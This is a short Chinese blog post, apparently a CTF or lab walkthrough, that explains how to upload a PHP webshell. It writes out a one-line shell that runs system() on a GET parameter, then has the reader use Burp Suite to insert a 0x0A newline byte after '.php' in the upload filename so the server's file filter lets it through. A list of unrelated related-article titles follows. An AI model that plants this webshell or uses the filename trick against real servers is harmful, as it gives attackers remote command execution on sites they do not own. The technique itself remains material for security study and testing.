Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
6v6-博客2 分钟前
u盘出现图片、文件,文件夹全部隐藏怎么办hj28625122 分钟前
Linux 网络服务综合笔记(概念 + 命令 + 实操案例)2ManageEngine卓豪26 分钟前
从性能故障到安全风险,现代企业数字化转型下的网络丢包运维管控指南guyuyiqi1 小时前
多效唑农药残留检测卡快速检测果蔬中的多效唑农药残留A_humble_scholar2 小时前
Linux(七)调度器:从硬件矛盾到进程切换的底层逻辑❀抽抽2 小时前
证件照制作API接入指南:700+规格一键生成Promise微笑2 小时前
绝缘油介损(油介损)测试仪的深层机理、技术演进与精准诊断策略测试仪器廖生135902563853 小时前
罗德与施瓦茨 FSP13频谱分析仪FSP30上海锝秉工控3 小时前
省线型增量编码器:用“减法思维“重构工业控制的未来